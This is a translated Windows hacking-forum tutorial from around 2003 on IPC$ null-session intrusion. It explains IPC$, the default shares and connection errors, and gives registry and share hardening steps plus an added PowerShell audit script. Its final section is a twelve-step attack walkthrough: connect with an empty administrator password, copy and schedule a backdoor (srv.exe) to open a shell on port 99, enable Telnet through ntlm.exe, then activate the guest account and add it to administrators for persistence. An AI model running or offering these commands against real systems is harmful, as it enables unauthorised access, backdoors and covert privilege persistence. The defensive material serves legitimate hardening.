One: Preface. There is no shortage of articles online about IPC$ intrusion, and the attack steps have even become a classic pattern, so nobody is willing to write about this topic any more. Even so, I personally think these articles are not detailed enough: for a beginner who meets IPC$ for the first time, a bare list of intrusion steps does not answer their confusion (just search any hacking forum for "IPC" and see how many doubts there are). So I wrote this tutorial in a question-and-answer style. I want to clear up the points that are most easily confused, so that everyone stops getting stuck in the same place! If you still have questions after reading this post, please reply right away!

Two: What is IPC$. IPC$ (Internet Process Connection) is a resource that shares a "named pipe" (everyone says this). It is opened so that the two sides of a connection can obtain the corresponding permissions after verifying a username and password, and it is used when remotely managing computers and viewing a computer's shared resources. With IPC$, the connecting side can even establish an empty (null) connection with the target host without any username or password (of course, the other machine must have IPC$ sharing enabled, otherwise you cannot connect), and through this null connection the connecting side can also obtain the list of users on the target host (although a responsible administrator will prohibit exporting the user list). We always talk about the "IPC$ vulnerability", but in fact IPC$ is not a true vulnerability: it is a remote network logon feature opened to make the administrator's remote management easier, and along with it the default shares are opened, that is, all logical disks (C$, D$, E$ ...) and the system directory Winnt or Windows (admin$). All of this was intended to make administration easier, but good intentions do not always produce good results. Some people with bad intentions (what intentions? I don't know, it is just a pronoun) take advantage of IPC$ to access shared resources, export the user list, and use dictionary tools to guess passwords, hoping to obtain higher privileges and thereby achieve unlawful goals.
Notes:
1) The IPC connection is a remote network logon feature unique to Windows NT and above, equivalent to Telnet on UNIX. Because IPC$ needs many DLL functions from Windows NT, it cannot run on Windows 9.x. That is to say, only NT/2000/XP can establish an IPC$ connection; 98/ME cannot (although some friends say a null connection can be established on 98, I do not know whether it is true; but it is 2003 now, so I suggest the 98 comrades change their system, 98 is not cool).
2) Even a null connection cannot be established 100% of the time: if the other side has closed IPC$ sharing, you still cannot connect.
3) It is not the case that you can always view the other side's user list, since administrators can prohibit exporting users.
Three: The role of the IPC$ connection in a hack attack. As said above, even if you have only established a null connection, you can still obtain a lot of information (and this information is often essential) and access part of the shares. If you can log on as a user with certain permissions, you obtain the corresponding permissions; obviously, if you log on as administrator, heh heh, no need to say more, what u want, u can do!! (Basically, you can obtain target information, manage the target's processes and services, upload a Trojan and run it, and if it is 2000 Server you can also consider opening Terminal Services for convenient control. Enough?) But you should not be happy too early, because the administrator's password is not that easy to get. Although there are some silly administrators with empty or mindless passwords, they are a minority, and now is not the past: people's security awareness has increased and administrators are more careful, so it will be harder and harder to get an administrator's password :( So your most likely result is a connection with minimal permissions or even no permissions at all, and you will slowly find that IPC$ is not universal; when the host has not enabled IPC$ sharing, you cannot even connect. So I think you should not regard IPC$ intrusion as an ultimate weapon, and should not think it decides the battle. It is like the pass before the goal on a football field: it rarely has a fatal effect by itself, but it is indispensable. I think that is the significance of the IPC$ connection in a hack intrusion.
Four: The relationship between IPC$, null connections, ports 139/445 and the default shares. The relationships above are something beginners find very confusing, but most articles make no special statement about them. In fact my own understanding is not very thorough either; all of this is summarized from discussions with everyone (a BBS with good discussion).
1) IPC$ and null connections: an IPC$ connection without a username and password is a null connection. Once you log on with the identity of a user or administrator (that is, an IPC$ connection with a specific username and password), it naturally cannot be called a null connection any more. Many people ask: since a null connection can be established, why do I still need to scan for weak passwords? Heh, as I mentioned before, when you log on with a null connection you have no permissions at all (very depressing), whereas when you log on as a user or administrator you have the corresponding permissions (who doesn't want permissions? So be a real man, don't be lazy).
2) IPC$ and ports 139/445: an IPC$ connection allows remote logon and access to the default shares; port 139 is opened by the NetBIOS protocol, and we can access shared files/printers through port 139 or 445 (Win2000). Therefore, in general, IPC$ depends on port 139 or 445.
3) IPC$ and the default shares: the default shares are shares opened by default to make remote management easier for administrators (you can of course turn them off), that is, all logical disks (C$, D$, E$ ...) and the system directory Winnt or Windows (admin$). Through the IPC$ connection we can access these default shares (provided the other side has not closed them).
Five: The more common reasons an IPC$ connection fails:
1) Your system is not an NT-class or later operating system;
2) The other side has not opened IPC$ default sharing;
3) The other side has not opened port 139 or 445 (blocked by a firewall);
4) Your command was typed incorrectly (such as a missing space);
5) Wrong username or password (for a null connection this of course does not matter).
Error number 51, Windows cannot find the network path: the network has a problem.
Error number 53, the network path was not found: the IP address is wrong; the target's LanmanServer service is not started; or the target has a firewall (port filtering).
Error number 67, the network name cannot be found: your LanmanWorkstation service is not started, or the target has deleted IPC$.
Error number 1219, the credentials supplied conflict with an existing set of credentials: you have already established an IPC$ connection with the other side, delete it first.
Error number 1326, unknown username or bad password: the reason is obvious.
Error number 1792, an attempt was made to log on but the network logon service was not started: the target's Netlogon service is not started (this appears when connecting to a domain).
Error number 2242, this user's password has expired: the target has an account policy that enforces periodic password changes.
The IPC$ connection is a fairly complex matter. Besides the reasons above there are other uncertain factors that I cannot list in detail; it depends on everyone gaining experience and experimenting.
Six: How to open IPC$ when the target has closed it (this paragraph is from related articles). First you need to obtain a shell that does not rely on IPC$, such as the SQL CMD extension, Telnet, or a Trojan; of course this shell must have admin privileges. Then you can use the shell to execute net share ipc$ to open the target's IPC$. As seen above, IPC$ has many prerequisites; please confirm that the relevant services are running. If they are not started (if you don't know how, see the usage of the net command), or if it still doesn't work (for example because of a firewall or antivirus software), it is recommended to give up.
Seven: How to defend against IPC$ intrusion
1. Prohibit null connections (this does not prevent a null connection from being established; taken from "Null sessions in Win2000"). First run regedit, find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] and change the DWORD value RestrictAnonymous to 00000001 (if it is set to 2, some problems will occur, such as some Windows services failing).
2. Prohibit the default shares
1) View the local shared resources: Run - cmd - enter net share
2) Delete the shares (enter one at a time): net share ipc$ /delete, net share admin$ /delete, net share c$ /delete, net share d$ /delete (if there are E, F, ... continue deleting)
3) Stop the Server service: net stop server /y (the shares will be reopened when the Server service is re-enabled)
4) Modify the registry. Run - regedit. Server version: find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and change the DWORD value AutoShareServer to 00000000. Pro version: find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and change the DWORD value AutoShareWks to 00000000. If the value mentioned above does not exist, create it (right-click - New - DWORD value) and then change its data.
3. Permanently close IPC$ and the service related to the default shares: LanmanServer, that is, the Server service. Control Panel - Administrative Tools - Services - find the Server service - (right-click) Properties - General - Startup type - Disabled
4. Install a firewall (check the related settings), or use port filtering (filter out 139, 445, etc.), or use the new version of Optimization Master
5. Set a complex password to prevent password guessing via IPC$ (this tutorial is not updated regularly; please visit the official website: Vegetable Bird Community original http://ccbirds.yeah.net)
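As an added example (not from the original tutorial), the following PowerShell script audits the three settings this section describes on the local machine: the RestrictAnonymous value under Lsa, the AutoShareServer/AutoShareWks values under LanmanServer\Parameters, and which administrative shares (names ending in $) net share still offers. It only reports by default; with -Harden it applies the values recommended above and deletes the shares. It assumes a modern Windows with PowerShell, run from an elevated prompt; the function and parameter names are my own.

```powershell
param([switch]$Harden)  # report only unless -Harden is given

$lsa    = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$params = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

# Read a DWORD, returning $null when the key or value does not exist yet.
function Get-Dword($Path, $Name) {
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.$Name
}

# Create or overwrite a DWORD (the section above says to create the value if absent).
function Set-Dword($Path, $Name, [int]$Value) {
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    New-ItemProperty -Path $Path -Name $Name -Value $Value -PropertyType DWord -Force | Out-Null
}

# Wanted values from the section above: RestrictAnonymous=1 (not 2), AutoShare*=0.
$checks = @(
    @{ Path = $lsa;    Name = 'RestrictAnonymous'; Want = 1 },
    @{ Path = $params; Name = 'AutoShareServer';   Want = 0 },
    @{ Path = $params; Name = 'AutoShareWks';      Want = 0 }
)

foreach ($c in $checks) {
    $have  = Get-Dword $c.Path $c.Name
    $shown = if ($null -eq $have) { 'absent' } else { $have }
    $state = if ($have -eq $c.Want) { 'OK' } else { 'WEAK' }
    "{0,-18} current={1,-6} wanted={2}  {3}" -f $c.Name, $shown, $c.Want, $state
    if ($Harden -and $have -ne $c.Want) {
        Set-Dword $c.Path $c.Name $c.Want
        "  -> set $($c.Name) to $($c.Want)"
    }
}

# 'net share' prints one share per line with the name in the first column;
# keep only names ending in '$' (IPC$, ADMIN$, C$, ...).
$adminShares = (net share) | ForEach-Object { ($_ -split '\s+')[0] } | Where-Object { $_ -match '\$$' }
"Administrative shares present: " + $(if ($adminShares) { $adminShares -join ', ' } else { 'none' })
if ($Harden) {
    # Same effect as the net share ... /delete commands above; they come back when
    # the Server service restarts unless the AutoShare* values are also 0.
    foreach ($s in $adminShares) { net share $s /delete }
}
```

Re-run the script without -Harden after a reboot to confirm the shares did not come back.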
Eight: Related commands
1) Establish a null connection: net use \\IP\ipc$ "" /user:"" (note: this command contains 3 spaces)
2) Establish a non-null connection: net use \\IP\ipc$ "password" /user:"username" (also 3 spaces)
3) Map a default share: net use z: \\IP\c$ "password" /user:"username" (you can map the other side's C drive to your own Z drive; other drives likewise). If you have already established IPC$ with the target, you can directly use IP\drive letter$ to access it; the specific command is net use z: \\IP\c$
4) Delete an IPC$ connection: net use \\IP\ipc$ /del
5) Remove a share mapping: net use c: /del deletes the mapping of drive C, other drives likewise; net use * /del deletes all mappings, and you will be prompted to confirm with Y
The following intrusion pattern is too classic, and most IPC tutorials have introduced it. I will borrow it from the original creator! (I don't know which senior you are.)
1. C:\>net use \\127.0.0.1\ipc$ "" /user:"admin" The username scanned with Fluxay ("Streamer") is administrators, the password is "empty", and the IP address is 127.0.0.1 (empty password? Wow, lucky). If you intend to attack, you can use such a command to build a connection with 127.0.0.1; because the password is "empty", nothing is entered in the first pair of quotes, the second pair of quotes holds the username, enter administrators, and the command completes successfully.
2. C:\>copy srv.exe \\127.0.0.1\admin$ Copy srv.exe first; it is in the Fluxay Tools directory (admin$ refers to the other side's C:\WinNT\System32\; you can also use C$, D$, meaning the C drive and D drive, depending on where you want to copy it).
3. C:\>net time \\127.0.0.1 Check the time; the current time of 127.0.0.1 is found to be 2002/3/19 11:00 AM, and the command completed successfully.
4. C:\>at \\127.0.0.1 11:05 srv.exe Launch srv.exe with the at command (the time set here must be later than the host's time, or how would it start, heh heh!)
5. C:\>net time \\127.0.0.1 Check the time again. If the current time of 127.0.0.1 is 2002/3/19 11:05 AM, prepare to run the following command.
6. C:\>telnet 127.0.0.1 99 Here the telnet command is used; note that the port is 99. Telnet defaults to port 23, but we used srv to open port 99 for us on the other side. Although we can telnet in, srv is one-shot and must be activated again next time! So we intend to build a Telnet service! This is where ntlm is used.
7. C:\>copy ntlm.exe \\127.0.0.1\admin$ Upload ntlm.exe to the host with the copy command (ntlm.exe is also in the Fluxay Tools directory).
8. C:\WINNT\system32>ntlm Enter ntlm to start it (here C:\WINNT\system32> refers to the other side; running ntlm actually runs the program on the other computer). When "DONE" appears, it has worked normally. Then use net start telnet to open the Telnet service!
9. telnet 127.0.0.1, then enter the username and password to enter the other side; operation is as simple as on DOS! (And then what do you want to do? Whatever you want, haha.) To be safe, we will add guest to the administrators group.
10. C:\>net user guest /active:yes Activate the other side's guest user
11. C:\>net user guest 1234 Change the guest password to 1234, or whatever password you want to set
12. C:\>net localgroup administrators guest /add Add guest to administrators ^_^ (if the admin password changes but the guest account is not changed, next time we can use guest to access this computer again)